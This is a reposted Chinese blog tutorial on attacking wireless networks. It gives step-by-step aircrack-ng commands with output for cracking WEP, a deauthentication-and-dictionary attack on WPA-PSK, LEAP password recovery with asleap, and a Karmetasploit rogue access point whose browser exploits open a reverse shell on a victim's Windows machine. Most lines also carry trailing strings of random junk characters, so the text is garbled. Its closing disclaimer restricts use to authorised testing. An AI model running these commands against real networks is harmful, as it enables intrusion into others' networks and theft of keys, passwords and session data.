U&SSc@of
Use this packet ? =% |f-x
rl-#Ez
;u<F,o(
我们仍然键入“y”。 olm'_ {{
C~PP}|<~V
E!`/XB/nA
Use this packet ? y =6N=5JePB
,+x\NY2d
Equ%6x
然后系统进行解密。 O#<S\66
iZ0(a
Saving chosen packet in replay_src-0223-211242.cap xXJzE|)1h!
?.ofs}
.ts XQf
Offset 87 ( 3% done) | xor = 4E | pt = 3C | Ds@K%f(.?w
Offset 86 ( 5% done) | xor = 16 | pt = 1D | P<9T.l
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 7w\!3pv
Offset 84 ( 8% done) | xor = 97 | pt = 6B | "V,dH%&j
Offset 83 (10% done) | xor = 0E | pt = 0A | QwuSo{G
Offset 82 (12% done) | xor = 86 | pt = 0D | &m{~4]qWpM
tq*{Hil>P`
$G Vf;M2*
64 frames written in 1097ms }( WUZ^L
119 frames written in 2029ms lg@q} ]1
146 frames written in 2476ms u@zT~\ h*
239 frames written in 4068ms Ae<;b Of
228 frames written in 3865ms qLB(Th\&'
273 frames written in 4646ms NNRKYdp,
+ Cq&~<B
" j:15m5
x/ P\qI
lPz5.(5'
Offset 81 (14% done) | xor = C9 | pt = 38 | 2 frames written in 35ms h5))D!
Offset 80 (16% done) | xor = C4 | pt = 34 | 185 frames written in 3145ms RP wP4Z
Offset 79 (17% done) | xor = BB | pt = 20 | 250 frames written in 4253ms <"S/M]9
Offset 78 (19% done) | xor = F7 | pt = 47 | 97 frames written in 1649ms @Tsdgx8
Offset 77 (21% done) | xor = E9 | pt = 4E | 247 frames written in 4196ms r\|" j8
Offset 76 (23% done) | xor = 12 | pt = 51 | 237 frames written in 4029ms L/O:V^1
Offset 75 (25% done) | xor = 56 | pt = 00 | 52 frames written in 884ms ;giT[KK
Offset 74 (26% done) | xor = 2A | pt = 00 | 431 frames written in 7326ms \0l"9 B.
Offset 73 (28% done) | xor = 7E | pt = 71 | 232 frames written in 3946ms }iR!uhi#
Offset 72 (30% done) | xor = 1C | pt = EB | 123 frames written in 2093ms uTP4r
Offset 71 (32% done) | xor = B6 | pt = CB | 9 frames written in 141ms j<i: rk|
Offset 70 (33% done) | xor = BC | pt = FA | 256 frames written in 4365ms f/=H#'+8
Offset 69 (35% done) | xor = 1A | pt = 18 | 179 frames written in 3041ms $EuI2.o
Offset 68 (37% done) | xor = 94 | pt = 50 | 118 frames written in 2002ms .fS1
Offset 67 (39% done) | xor = 50 | pt = 71 | 65 frames written in 1109ms eadY(-4|I-
Offset 66 (41% done) | xor = 9D | pt = 55 | 172 frames written in 2921ms ((Wq
Offset 65 (42% done) | xor = 3C | pt = 48 | 196 frames written in 3338ms o=do L{ #
Offset 64 (44% done) | xor = BE | pt = F6 | 281 frames written in 4763ms e +O0l
Offset 63 (46% done) | xor = 81 | pt = BE | 61 frames written in 1051ms 'I)E.DoF
Offset 62 (48% done) | xor = AC | pt = 17 | 456 frames written in 7748ms lD)QB!*v
Offset 61 (50% done) | xor = D2 | pt = 72 | 73 frames written in 1231ms jhSc9
Offset 60 (51% done) | xor = 9C | pt = 34 | 428 frames written in 7288ms _{'HY+M
Offset 59 (53% done) | xor = 64 | pt = B7 | 120 frames written in 2036ms ]]bL;vlw
Offset 58 (55% done) | xor = 87 | pt = 55 | 188 frames written in 3200ms Y<-dd"\
Offset 57 (57% done) | xor = 0C | pt = 47 | 119 frames written in 2024ms K)t+lJ
Offset 56 (58% done) | xor = 8C | pt = 07 | 124 frames written in 2095ms HzF]hm,
Offset 55 (60% done) | xor = 2C | pt = 02 | 364 frames written in 6197ms &`[Dl(W
Offset 54 (62% done) | xor = 25 | pt = 00 | 136 frames written in 2315ms p)=Fi}#D\
Offset 53 (64% done) | xor = 44 | pt = A8 | 142 frames written in 2410ms ^ $t7p 1
Offset 52 (66% done) | xor = A2 | pt = C0 | 102 frames written in 1733ms O WVa&8O
Offset 51 (67% done) | xor = C9 | pt = 14 | 19 frames written in 329ms U GJ# "9
Offset 50 (69% done) | xor = D5 | pt = 6B | 183 frames written in 3110ms mam2]St"
Offset 49 (71% done) | xor = 0B | pt = 2E | 62 frames written in 1048ms 9:tKRN_D
Offset 48 (73% done) | xor = E8 | pt = CF | 18 frames written in 306ms 2@S{e$YK`
Offset 47 (75% done) | xor = FB | pt = 86 | 29 frames written in 496ms f ^f{tOX
Offset 46 (76% done) | xor = 4B | pt = 3D | 100 frames written in 1702ms P:y M j&)
Offset 45 (78% done) | xor = D6 | pt = 06 | 77 frames written in 1312ms Yxt`Uvc(^h
Offset 44 (80% done) | xor = FD | pt = 6D | 226 frames written in 3828ms \f_YJit
Offset 43 (82% done) | xor = 27 | pt = 00 | 117 frames written in 2001ms RHGs (d7-
Offset 42 (83% done) | xor = 4F | pt = 40 | 38 frames written in 641ms uiIY,FL$
Offset 41 (85% done) | xor = 1C | pt = 54 | 354 frames written in 6020ms Td5;bg6Qy
Offset 40 (87% done) | xor = 20 | pt = D5 | 277 frames written in 4714ms QviH+9
Offset 39 (89% done) | xor = C4 | pt = 30 | 113 frames written in 1918ms ;Qc_Tf=,
Offset 38 (91% done) | xor = 2C | pt = 00 | 485 frames written in 8244ms ?B2 T'}~
Offset 37 (92% done) | xor = 8A | pt = 00 | 231 frames written in 3933ms iS^IqS
FU|c[u|z
The AP appears to drop packets shorter than 37 bytes. n^;:V8k
Enabling standard workaround: IP header re-creation. el*C8TWlw
Cu0N/hBT
ozbu|9 +v
UNJ]$x0
eM*@zo<-
This doesn't look like an IP packet, try another one. [e+"G <>
XTD _q
Warning: ICV checksum verification FAILED! Trying workaround. 42?X)n>
The AP appears to drop packets shorter than 40 bytes. SR#X\AWM
Enabling standard workaround: IP header re-creation. [{ak&{R,9{
n_%JXm#\
Saving plaintext in replay_dec-0223-211410.cap xr) Rx{)3h
Saving keystream in replay_dec-0223-211410.xor z./M^7v?
xQa[bvW
Completed in 21s (2.48 bytes/s) !Jw
#~54t0|Cd>
这一过程由 xor 文件和 cap 文件产生。xor 文件包含密钥流;cap 文件包含解密数据包。 &_ Ewu@4
M=$y_9#
MPMJkL$F^
'}*5ee](S
z]> 0A
[0x05f] - 数据包伪造 FS r `Y
W{l+_a{/9
Re('7m h~
创建加密的数据包形式 PRGA(XOR)从 ChopChop 或碎片得到。 FfN==2:b
!'Xk=+
mCe,(/>l+
#Packetforge-ng -0 - a xx:xx:xx:xx:xx:xx - h yy:yy:yy:yy:yy:yy - k X~Uvh8O
255.255.255.255 -y replay_dec-0223-211410.xor -w arp |Sy |E
g.X?wyg5
其结果是: m1=3@>
`h( JD$w
Wrote packet to: arp |cJyP9}n
cu]2`DF
8HdmG{7.
从这个命令中,我们得到 ARP 请求数据包中的文件名为“arp”。 )M LOYX
C',D"
9zEO$<e o
]x?9lQ1&
zF.rsNY
[0x05g] - 交互式 ARP 重播*** g AC}
/K:M ,q
z)=D&\HX
我们使用 aireplay 注入 ARP 请求数据包到接入点。通过输入下面的命令。 wt[MzpRP
Byyus[b'A
#aireplay-ng -2 -r arp rausb0 b-U LoV
n`? j. s
响应将如下所示所示: cfMj^*I
NQ !t`
Size: 68, FromDS: 0, ToDS: 1 (WEP) 5Y#yz>B@ ]
R8F[ 7&(
BSSID = 00:1B:2F:3D:CB:D6 s\1h=V)!H
Dest. MAC = FF:FF:FF:FF:FF:FF ~;QO`I=0P
Source MAC = 00:21:27:C0:07:71 "'p:M,:
\$T
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q f ySzZ
vXLiYWo
;RB]awE
255.255.255.255 - l j1*'yvGM
8 ]]uk=P
LoSblV
Mg W0 ).
{3@f(H m
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334........... ..U....N.4 /@X!
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l; A&jkc'
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~ S3EY9:^ C
0x0040: 66bf 700e f.p. %/"I.\%d
D)U 9xA)J
Use this packet ? x :\+{-
G|Rsj{2'
m~'!
我们回应“y”。 8om6wALXB
&l"/G%W
Use this packet ? y E;/WP!/.
"XlNKBgM
aireplay-ng 开始注入数据包。 Q^prHn*@
C]414Ibi
x? tC2L
Saving chosen packet in replay_src-0223-211755.cap U$v|c%6
You should also start airodump-ng to capture replies. p4GhT~)l:
7rQwn2XD{
Sent 1200 packets...(499 pps) k>E^FB=
i)y8MlC{
,`PC^`0c}o
p[R4!if2
mSLA4[4{
?+av9;Kg
[0x05h] - 破解 WEP 密钥 7irpD7P>
在我们收集足够的加密包之后,我们使用 aircrack-ng 来恢复密钥。 zU7co.G
#aircrack-ng -z capture1.cap (PTW Attack) Em)U`"j/9
!q\MXS($#u
成功地破解结果如下所示: F t/yPv
QO2@K1Y
Opening capture1.cap _U.|$pU
Attack will be restarted every 5000 captured ivs. Starting PTW attack with 50417 ivs. ! Gob `# r
KEY FOUND! [ 00:11:22:33:44 ] &O +?#3
Decrypted correctly: 100% YI+ clh;%9
0JFS%Yjw[
^h\(j*/#X
Q g~cYwX
Ri>4:V3K
'0-YFx'U0V
[0x06] - 破解 WEP 的总结脚本 "@z X{^:
Az7 ] qb
6am g*=]
Note: $AP 是接入点的 MAC 地址 W4;/;[/L
$WIFI 是 WIFI 网卡的 MAC 地址 IOA2/ WQu
- airmon-ng start wlan0 11 (监控模式必须确定具体频道)- airodump-ng -c 11 -w capture1.cap wlan0 uMx6:
za%gD
rJZR8bo
cY5w,.Q/!
- aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0 - aireplay-ng -4 -b $AP -h $WIFI wlan0 7}:+Yx
If Not Work!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0 !4-4i
- packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay_dec-03.xor -w arp-request Vwu dNjL
- aireplay-ng -2 -r arp-request wlan0 wz'=
- aircrack-ng -z capture1.cap F r!FV4
vgE -t
** 这些方法可用于客户端的 WEP 破解。 fat;5XL@
@R-11wP)M
U9ZuD40\
2X<%BFsE
-woFKAy`
[0x07] - 拥有 WPA-PSK/WPA2-PSK 密钥 o$eo\X?J?
d~AL4~}
=z;]FauR!
PSK 代表 Pre-Shared 密钥。这些机制的改善从而解决了 WEP 的脆弱性。 CT5s`v!s
因此,它能够使用相同的破解 WEP 方式来破解密钥。只有这样,才能恢复 WPA-PSK 或 WPA2-PSK,也就是说获取4 次握手并利用字典***的破解。 G^N@ r:RS
这个主意破解 Pre-shared 密钥是收集四次握手包。我们能够做到这一点,去验证相关的客户端。这种方式将迫使客户端进行重新验证,我们可以在这个进程中进行四次握手。验证命令如下所示:#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0 U?an\rv
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11 ; PncJe5x
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs] YA@MLZm
我猜想我们获取了这一进程 workshop.cap 文件。所以,我们使用 aircrack 进行破解。#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap .%y'q!?
成功的结果如下所示: Cdy,8*
T60pw
Opening test-02.cap <}:` Y"
Read 252 packets. Q^ZM|(s#
>{QO$F#
# BSSID ESSID Encryption #bBh. ^
4d%0a%Z
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake) O^3kPVr
E_En"r)y
Choosing first network as target. F$(ak;v}
5L:-Xr{
Opening workshop-02.cap oz>2P.7
Reading packets, please wait... t))MZw&@
PWyf3
(T0MWp0
5LB{b]w7m
?!&%-R6*
Aircrack-ng 1.0 rc1 r1085 | bz%SB
6IG?t
8'zZVX D<
[00:00:00] 0 keys tested (0.00 k/s) Ac|\~w[\
hK{H7Ey*
7n6g;8xE
KEY FOUND! [ TheFuckinWPAKey ] IO)#O<
{?eU AB<
>4jE[$p]"
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 X)[tb]U/Wx
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63 /@k#tdj
Si>38vCJ*
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 qU7_%Z
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2 }I&.xzJ
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86 ~2"hh$
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1 Q2 VF+g ,
]a4U\yr
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D (c(F1=K
Bzrnmz5S
zHb [.ry~
从这个结果中可以看出,它意味着 WPA-PSK/WPA2-PSK 密钥是“TheFuckinWPAKey”。 =Z
W5 F\e[Ax5
p H y
T U0-L35P1
;>v.(0FE6
[0x08] - 无线网企业漏洞利用 (WPA-TLS/TTLS/PEAP) Dcvul4Q
E$)|Kv^
大多数公司转向使用公共密钥加密的无线网络,他们认为这是绝对安全的。但是,狡猾的***者***这一系统仍然是由欺骗证书。 A)&FcMO*z
这种***方法是一种利用客户端信息。许多客户端接受认证而不考虑它是否是真正的证书或没有证书。这使***者冒充自己是 RADIUS 服务器和 Loggin 凭证资料的受害者。 ={O ~
我们可以使用 Freeradius 伪装 Radius 服务器与 WPE 补丁结合,使 Loggin 凭证资料到 Freeradius 服务器。附加说明: http://www.willhackforsushi.com/FreeRADIUS_WPE.html ( 2 HM "Pd
ETdXk&AN
<?nIO
/I`TN5~
[0x09] - CISCO LEAP 漏洞利用 <kK>C8+
JN0h3nZ_
Cisco 专有轻量级扩展身份验证协议(LEAP)无线认证过程有助于消除安全漏洞,基于用户的认证,并能够产生动态的 WEP 密钥。Cisco LEAP 是一个所指定的 802.1X 可扩展身份验证协议(EAP)类型。 1Z# $X`
o&?c,FwN
LEAP 是易于执行和控制的特性,如: z'q~%1t
- 相互身份验证 H#TkIFo]
- 基于用户验证 rwF$aR>9
- 动态 WEP 密钥 SyvoN, ;Q
本文转载自:神秘小强' blog QQ交流群:29097418 M~:_^B
p;+O/'/j
我们发现用户名是以明文发送到 Radius,但捕获的 Wireshark 密码是加密的,因此,同样容易进行漏洞利用。asleap 是一个工具,用来恢复脆弱的 LEAP 和 PPTP 密码,asleap 可以执行: +0pI}a\
NIV}hf YF
- 脆弱的 LEAP 和 PPTP 密码恢复 <Vhd4c
- Deauthentication 客户端的 WLAN(加快 LEAP 密码恢复)AIRJACK 驱动程序 {*yvvb
Q|(}rIWOQA
下载 Asleap http://asleap.sourceforge.net/ ; I>nA6A
OyTK,i<n
第一步,使用 asleap 建立必需的资料库(.dat)和索引文件(.idx) [6!k:-t+
nrl?<4 _
#./genkeys -r dict -f dict.dat -n dict.idx P7drUiX
,!:c6F+
dict = Our wordlist/dictionary file, with one word per line X7*F~LFr j
dict.dat = Our new output pass+hash file (generated as a result of running this command) P6gkbtg
dict.idx = Our new output index filename (generated as a result of running this command) bY~K)j v3&
6Og@tho
#./genkeys -r dictionary -f dict.dat -n dict.idx 'Ea3(OsuXn
PL:(Se%
genkeys 1.4 - generates lookup file for asleap. < mailto:jwright@hasborg.com > Generating hashes for passwords (this may take some time) ...Done. 3 hashes written in 0.2 seconds: 122.67 hashes/second uKJ:)oyaCP
Starting sort (be patient) ...Done. - nb U5o
Completed sort in 0 compares. mY 1l2
Creating index file (almost finished) ...Done. iJTG +gx
,HjJ jpE
yhH2b:nY(9
最后一个步骤是恢复薄弱的 LEAP 密码,运行 asleap 命令创建新的.dat 和.idx 文件: D2ggFxqe
;j0.#P:a
#./asleap -r data/leap.dump -f dict.dat -n dict.idx +Y?Tri
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used) 2"6L\8hd2
dict.dat = Our output pass+hash file (generated with genkeys, see above) +Nn >*sz
dict.idx = Our new output index filename (generated with genkeys, see above) wX] _Abk
Q 8]X
#./asleap -r data/leap.dump -f dict.dat -n dict.idx LW=qX%o {
%<yW(s9{
\KV.lG!
asleap 1.4 - actively recover LEAP/PPTP passwords. < mailto:jwright@hasborg.com > Using the passive attack method. 7] y3<t
Captured LEAP exchange information: ir^d7CV,
username: qa_leap KE\>T:
challenge: 0786aea0215bc30a X0*+]tRg
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6 sD3Ts;k
hash bytes: 4a39 >D=X Tgqqq
9No6\{[M
(0`rfYv5.R
^ iu)vED
`_ ^I 2
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39 z{R Mb
password: qaleap !UzE&CirV
Closing pcap ... 6~ET@"0uK
[]OS p&
OBFM70K
注意:成功率取决于字典大小 KMT$/I{p,
,,FhE
现在 ASLEAP 2.2,包含“-C”和“-R”选项来指定十六进制分割字节的挑战与对策。使用此选项,Asleap 成为一个通用的 MS-CHAPv2 破解工具。 hj= n;,a9
.WglLUJ:Z
qPu?rU{2
HmXxM:[4;
1xxTI{'g[
*4 m]UK
[0x10] - Karmetasploit 大规模利用 :4:U\k;QwA
gC6Gm':c
c7rC!v
HD Moore 发布了一些说明信息( http://trac.metasploit.com/wiki/Karmetasploit)获得 karmetasploit 工作的框架。 i [/1AI
BAqwYWdS
Karmetasploit 可以发送伪装 AP 并与客户端连接。***者可以记录 Cookie、Ftp、Http、认证信息等等。还可以在客户端机器利用浏览器漏洞。 |r*y63\T
1\jj3Y'i'
这种方法测试在 Backtrack3(最终) E]Cm#B
http://www.smxiaoqiang.cn/ &Ai +t2
1. 更新 Aircrack-NG P@etT8|V
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng $ make &S^a_L:
# make install "t{D5{q|[k
2. 让我们测试一下 aireplay-ng 的工作(注入数据包必须支持你的无线网卡) Dhft[mvo
bt# aireplay-ng -9 wlan0 [c>YKN2qa
15:10:21 Trying broadcast probe requests... 15:10:21 Injection is working! eET1f8 B=L
15:10:25 Found 5 APs `C:J{`
G!GGT?J
15:10:25 Trying directed probe requests... YZ0Q?7l7
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC' 15:10:35 0/30: 0% Jl) Q #
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP' 15:10:42 0/30: 0% $+ \JT/eG9
ECOzquvM
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM' F-?s8RD
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27 15:10:48 5/30: 60% p-8x>dmP(
15:10:48 Injection is working! )J|~'{z:
5,V3_p:)VI
b;e*`f8T3c
nrZZkQNI
~p/1 9/
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi' 15:56:53 0/30: 0% [tz}H&
?F%,d{^
现在它在进行注入工作! 7N fA)$
&qFy$`"
3. 更新 Metasploit +,Z Q( ZW
h-:te9p6>4
$ svn co http://metasploit.com/svn/framework3/trunk msf3 LZ*ZXFIg
GZqy.AE,
4. 下载 Bash 脚本 http://www.darkoperator.com/kmsapng.tgz 2~*.X^dR
.q (1
该脚本执行以下操作: PzD ekyl
- 改变 MAC 地址的接口 iyf vcKO
- 设置监听模式的接口 ;JQ;LbEn
- 启动 Airbase-ng 的 Karma AP uz;z+Bd^
- 更改 MTU 接口大小 %Y//}
- 设置 IP 地址 N1i%b,:3
- 启动 DHCPD 服务器 - }9a%
- 设置 iptables 重定向 aqzIMOAf
- 启动 Metasploit aoVfvz2Y
'l*p!=
6. 然后我们运行 kmsapng.sh,像这样: bs=x>F
Wc q UF"A
#./kmsapng.sh -i wlan0 -m km -s linksys e${Cf
:N ~A7@
Changing MAC Address Ga1(T$ |H
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation) 9( "<NB0y
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.) %RS8zN
starting fake ap zLda&#+
This will take 15 seconds ... .>Fy ]Cqoh
DHCPD started successfully yTb#V"eR
Starting Packet capture to /root/kms.cap p,K]`pt=
Starting Metasploit +<o}@hefY2
3"HW{=
_ ]d]rV `RF
| | o o1zKns?
_ _ _ _ _|_ __, , _ | | __ _|_ $]t3pAI[H0
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| | /\0g)B ;]
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/ 82*nC!P3E
/| _aj,tz
\| 9 m`VIB
3yw`%$d5
=[ msf v3.2-release {GP#/5$=
+ -- --=[ 304 exploits - 124 payloads r(6$. zx
+ -- --=[ 18 encoders - 6 nops x@*!MC #
=[ 79 aux ^Ez`WP
T1[B*RwC
resource> load db_sqlite3 .:/[%q{k
,?/AIL]_
PyQ P K,
cfhiZ~."T
[*] Successfully loaded plugin: db_sqlite3 e` {F7rd:
resource> db_create /root/karma.db uP NZ^lM
[*] The specified database already exists, connecting [*] Successfully connected to the database &X&msEM
[*] File: /root/karma.db i8|0z I
resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 172.16.1.207 .hVB)@ /
AUTOPWN_HOST => 172.16.1.207 w g U2q|
resource> setg AUTOPWN_PORT 55550 E@[ZwTnJ
AUTOPWN_PORT => 55550 PSREQK@}E
resource> setg AUTOPWN_URI /ads nv'YtmR
AUTOPWN_URI => /ads EAZLo;
resource> set LHOST 172.16.1.207 O0RV>Ml'&
LHOST => 172.16.1.207 n =qu?xu
resource> set LPORT 45000 BBDt^$
LPORT => 45000 R?5v //[
resource> set SRVPORT 55550 pK NrEq
SRVPORT => 55550 P TMJ.;
resource> set URIPATH /ads D/&nEMp6
URIPATH => /ads 7 V3r!y
resource> run +[Bl@RHe^
[*] Starting exploit modules on host 172.16.1.207... 2#)z%K6T
[*] Started reverse handler 6Ij'z9nJw
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto I4(z'C
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto a?1Ml>R6P
[*] Server started. 1+v!)Y>Z&
[*] Started reverse handler U#g ,XJ
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava }s@vN8C
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava ;!pSYcT,
[*] Server started. O#n=mJ
[*] Started reverse handler VI k]`)#
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface K;l xPM]
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface bsv!z\}
[*] Server started. w=kW~gg
[*] Started reverse handler w,1&s}; g\
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp ~nRbb;M
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp ,b9!\OWDF
[*] Server started. (w1$m8`=
[*] Started reverse handler &~V6g(9
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings FJ] ?45
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings mGh8/Xt
[*] Server started. Kb~i9x&
[*] Started reverse handler M a^}7D /
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype [7Liken
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype @+yjt'B
[*] Server started. _18Aek
[*] Started reverse handler A`nzqe#(1
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject .TO#\!KBv
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject >!PCEw<i
OZ4%6/
?*:BgaR_
F7\nG}#s
."j=s#OC(
[*] Server started. 9#1Jie$
[*] Started reverse handler AA5UOg\jI
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe [*] Server started. #Yx /ubg6
[*] Started reverse handler ^zKP5nzL
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core [*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core [*] Server started. ^&\<[ \
[*] Started reverse handler Q|7;Zsd:
[*] Server started. ntn ~=oL
[*] Using URL: http://0.0.0.0:55550/ads Dv}VmC""
[*] Local IP: http://127.0.0.1:55550/ads >S@><[C
[*] Server started. &/$ 3>MD2`
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 110 WD|pG;Gq
SRVPORT => 110 3+8{Y
resource> set SSL false L RPdA "Z
SSL => false nQ;M@k&9eV
resource> run 1 }_"2
[*] Server started. S+u@ Q}
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/pop3 resource> set SRVPORT 995 ^t P|8k
SRVPORT => 995 ^]9.$$GU\A
resource> set SSL true i}~U/.P
SSL => true v K!vA-7
resource> run e\ ! ic
[*] Server started. ?-=<7 ~$
[*] Auxiliary module running as background job resource> use auxiliary/server/capture/ftp 89ab?H}/
resource> run I]Vkaf I>(
[*] Server started. /e7BW0$1
&'c&B0j
43Ua@KNi
v|:TYpku3
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493... [*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507) N2&h yM
ZQ[s/
msf auxiliary(http) > sessions -i 2 {$'oKJy*
[*] Starting interaction with 2... #{zF~/Qq
VTn6@z_ x
Microsoft Windows XP [版本 5.1.2600] ]Mj N)%hT
(C) 版权所有 1985-2001 Microsoft Corp. _s+_M+@et
z*`nfTw l
D:\Mozilla Firefox> cd .. A3Y}|7QA
CFG(4IMx
I1W~;2cK
43N=O FU
>H,PST
D:\> net user Cd7l+~*Y
o.])5i_HV
\\CZY 的用户帐户 #w;%{C[D
La\|Bwx
/ a$B8,
__vmware_user__ Administrator ASPNET O:+?:aI@
Guest HelpAssistant IUSR_CWH E*8).'S%k
IWAM_CZY CZY SUPPORT_388945a0 Pi=B\=gs
命令成功完成。 2UEjn>2
6<9gVh<=w
=7 -@&S=?s
?xtP\~
]SNcL [U
[0x11] - 旅程的尾声 iTJE:[W"y
SaA-Krn
操作都是处于 Linux 环境下完成的,无论如何,我希望它对你有所帮助。 +P;&/z8i*g
-PskUl'
本文是针对交流技术和合法的***测试目的而写,作者不负责使用此文件内容所带来的损害。如果你想对其他人的系统使用这方面的技术,则必须要求对方同意或合法的***测试。
转载于:https://blog.51cto.com/changfei041/290588